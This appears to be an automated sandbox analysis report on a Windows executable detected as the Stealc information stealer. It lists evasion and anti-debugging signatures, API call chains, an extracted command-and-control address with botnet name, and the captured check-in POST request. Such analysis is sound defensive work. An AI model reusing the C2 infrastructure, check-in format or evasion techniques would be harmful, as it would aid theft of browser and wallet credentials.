Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565520
MD5:bb0c42d0421512d8f7796f5253543456
SHA1:8b3139e22e253adc3b55d8743a7d4cc173aa567d
SHA256:29ca807f5372fed46f73a09b357be9a41c7271307d273a20fe9045eeadce65e8
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BB0C42D0421512D8F7796F5253543456)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5436JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5436JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T04:12:02.565183+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.5436.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00124C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001260D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_001260D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00136AA0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00136AA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001442C0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001442C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00129B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00129B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012EB80 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0012EB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00136CB9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00136CB9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00127750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00127750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001319F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001319F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00133A70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0012DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001313B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001313A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013E3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013E3F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00134C70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00134C89
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001324F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001324F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001324E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_001324E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013CDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013CDD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001216B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001216A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013D720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0013D720
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013DF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0013DF20

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 34 30 31 30 44 43 35 38 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"DA4010DC58231817704571------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"drum------IIJKJDAFHJDHIEBGCFID--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00124C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 34 30 31 30 44 43 35 38 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"DA4010DC58231817704571------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"drum------IIJKJDAFHJDHIEBGCFID--
              Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpf
              Source: file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00129770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005698C70_2_005698C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047A8AB0_2_0047A8AB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DA9130_2_004DA913
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E49BA0_2_005E49BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CE1CB0_2_003CE1CB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060F19C0_2_0060F19C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DFA520_2_004DFA52
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00420A3D0_2_00420A3D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EEA8A0_2_004EEA8A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144AC00_2_00144AC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4B150_2_004E4B15
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E645A0_2_004E645A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E4630_2_0056E463
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00451C1E0_2_00451C1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ED4150_2_004ED415
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DC4A50_2_004DC4A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044D55E0_2_0044D55E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1D180_2_004E1D18
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D8D920_2_004D8D92
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00556DA80_2_00556DA8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004336130_2_00433613
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005687270_2_00568727
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDF370_2_004DDF37
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E6FF70_2_005E6FF7
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00124A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144820 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00144820
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013CCD0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0013CCD0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\M2KPUCNO.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
